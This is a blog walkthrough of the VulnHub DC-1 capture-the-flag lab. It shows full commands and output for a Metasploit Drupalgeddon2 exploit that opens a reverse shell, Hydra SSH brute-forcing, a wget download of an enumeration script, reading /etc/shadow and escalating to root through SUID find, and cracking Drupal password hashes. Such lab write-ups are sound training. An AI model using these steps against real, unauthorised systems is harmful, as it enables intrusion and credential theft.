Tuesday, October 8, 2019

VulnHub: DC-1 Walkthrough

We start off by running a nmap scan against the host to see what we can find. 

root@ubuntu:~/src/JohnTheRipper/run# nmap -sV -O -sC 192.168.56.107

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-08 14:09 MDT
Nmap scan report for 192.168.56.107
Host is up (0.00060s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          33884/udp  status
|_  100024  1          34568/tcp  status
MAC Address: 08:00:27:AA:94:9F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.2
OS details: Linux 3.2, Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds
root@ubuntu:~/src/JohnTheRipper/run#

We can see that three ports are listening: ssh,http and rpcbind. my first thought when seeing the rpcbind program is maybe the box is running NFS. to check we issue the rpcinfo and showmount commands to see what we can find. 

root@ubuntu:~/src/JohnTheRipper/run# rpcinfo -p 192.168.56.107
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  33884  status
    100024    1   tcp  34568  status
root@ubuntu:~/src/JohnTheRipper/run# 
root@ubuntu:~/src/JohnTheRipper/run# showmount -e 192.168.56.107
clnt_create: RPC: Program not registered
root@ubuntu:~/src/JohnTheRipper/run#

No luck here. NFS is not running on the remote host apparently so lets move on to the HTTP port 80.

We can see from the NMAP output that the remote site is running some version of drupal and has a robots.txt file available for viewing. lets start by visiting the site and see what we are working with here.

It looks like a standard drupal install. What we need to find out is the version of drupal it is running and the search for exploits. The first thought which came to my head was to view-source on the home page and see if there is any juicy information we can find.

IF we look close the source code gives us what we want, which is a version. 

meta name="Generator" content="Drupal 7 (http://drupal.org)"

Now that we have a version number we can move on to searching for possible exploit for the drupal cms. For this we will use Metasploit. 

msf5 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


msf5 >

After doing some research on google the drupalageddon exploit look like it will suit our needs and our next task which is to exploit the webapp. 

msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.56.107
RHOSTS => 192.168.56.107
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (38288 bytes) to 192.168.56.107
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.107:45654) at 2019-10-08 14:32:45 -0600

meterpreter > shell
Process 3478 created.
Channel 0 created.
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

It worked! now we have a shell on the remote system. My first thought is to check the /etc/passwd file to see what users we have on the system. 

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

Well we found a possible flag a user named flag4 this means at some point we will have to get access to the user flag4 and probably login. I remember though that the server is running ssh which gives me the idea to brute force the flag4 user. I start up hydra and get cracking. 

root@ubuntu:~/src# hydra -l flag4 -P /home/sam/wordlists/1000-most-common-passwords.txt ssh://192.168.56.107
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-08 14:42:44
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1002 login tries (l:1/p:1002), ~63 tries per task
[DATA] attacking ssh://192.168.56.107:22/
[22][ssh] host: 192.168.56.107   login: flag4   password: orange
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-08 14:43:11
root@ubuntu:~/src#

It didn't take long to crack... lets login and see what we can find. 

root@ubuntu:~/src# ssh -l flag4 192.168.56.107
flag4@192.168.56.107's password: 
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$

If we ls the cwd we find flag4.txt. 

flag4@DC-1:~$ cat flag4.txt 
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?
flag4@DC-1:~$

This lets us know there a flag in /root. But moving on lets download a linux enum script and run it on the remote host to see if we can escalate our privileges on the box some way. 

flag4@DC-1:~$ wget http://192.168.56.101/LinEnum.sh
--2019-10-09 06:58:56--  http://192.168.56.101/LinEnum.sh
Connecting to 192.168.56.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45656 (45K) [application/x-sh]
Saving to: `LinEnum.sh'

100%[==========================>] 45,656      --.-K/s   in 0.001s  

2019-10-09 06:58:56 (71.5 MB/s) - `LinEnum.sh' saved [45656/45656]

flag4@DC-1:~$

After the LinEnum.sh script ran I came across a interesting finding which tells use that the find utility has the SUID bit set meaning it can run commands as a higher privileged user than the one we are now, possibly root. Find allows you to execute commands on each file it finds so lets start there and see what we get. 

-e \e[00;33m[+] Possibly interesting SUID files:\e[00m
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
-e 

flag4@DC-1:~$ find /etc/shadow -exec cat {} \;
root:$6$rhe3rFqk$NwHzwJ4H7abOFOM67.Avwl3j8c05rDVPqTIvWg8k3yWe99pivz/96.K7IqPlbBCmzpokVmn13ZhVyQGrQ4phd/:17955:0:99999:7:::
daemon:*:17946:0:99999:7:::
bin:*:17946:0:99999:7:::
sys:*:17946:0:99999:7:::
sync:*:17946:0:99999:7:::
games:*:17946:0:99999:7:::
man:*:17946:0:99999:7:::
lp:*:17946:0:99999:7:::
mail:*:17946:0:99999:7:::
news:*:17946:0:99999:7:::
uucp:*:17946:0:99999:7:::
proxy:*:17946:0:99999:7:::
www-data:*:17946:0:99999:7:::
backup:*:17946:0:99999:7:::
list:*:17946:0:99999:7:::
irc:*:17946:0:99999:7:::
gnats:*:17946:0:99999:7:::
nobody:*:17946:0:99999:7:::
libuuid:!:17946:0:99999:7:::
Debian-exim:!:17946:0:99999:7:::
statd:*:17946:0:99999:7:::
messagebus:*:17946:0:99999:7:::
sshd:*:17946:0:99999:7:::
mysql:!:17946:0:99999:7:::
flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::
flag4@DC-1:~$

It worked plus it means we are running commands a root. let see if we can drop to a root shell with find. 

flag4@DC-1:~$ find . -exec '/bin/sh' \;
# id
uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)
# whoami
root
#

That worked too. lets see if we can find the flag file in the root directory we were told about eariler. 

# pwd
/home/flag4
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 173 Feb 19  2019 thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#

Well that was fun. I know I skipped steps in the process but I guess I just got lucky. Now its time to search for the other flags we missed. if you remember we had a website running drupal where we got a shell on through metasploit. Let go back to that and see what we can find.

Missed Flags

Here we have a shell on the remote host through metasploit as a low privileged user www-data. my first instinct is to raid the config files looking for login information for possibly a database or another web service. I googled the default drupal configuration path and sure enough the file was in there. Looking in the config file we find the second flag and a mysql database login which we can try and access locally. 

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

Now we login to the database and see what the users table looks like. 

$ mysql -u dbuser -p
Enter password: R0ck3t

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 86
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

mysql> use drupaldb;
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)

mysql> select * from users;
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |  

mysql>

It looks like we got two users in the database we can check out. These hashes are drupal 7 hashes which can be cracked with John The Ripper. I am going to use the good old rockyou.txt wordlist and see if we get lucky. 

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/wordlists/hashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
MyPassword       (?)
53cr3t           (?)
2g 0:02:20:00 DONE (2019-10-08 01:12) 0.000238g/s 266.8p/s 331.0c/s 331.0C/s 53cr3t..53997777
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run#

That took a while but both usernames were cracked successfully. Now let go back to the website and try and login with the 'admin' user name.

It looks like we logged on successfully now lets browse the site starting with the dashboard and see what we can find.

It looks like we found flag 3 lets click on it and see what it says.

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

This is eluding to the find utility with the SUID bit set on it. We figured that out eariler thanks to the LinEnum script.

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...
  • Socat Encrypted Bind and Reverse shells
    Encrypted Bind Shell First we need to generate a new openssl key to use with our bind shell. Victim Box: user@debian:~$ openssl req -ne...
  • DVWA: SQL Injection (Blind) with sqlmap
    We start off by getting the database names hosted on the remote server. sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192...
  • Exploring NTP servers
    The ntpupdate command is used for updating your system time from a remote NTP server root@asus:~/unix% ntpdate -d 48.21.33.124 24 Sep 11:...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...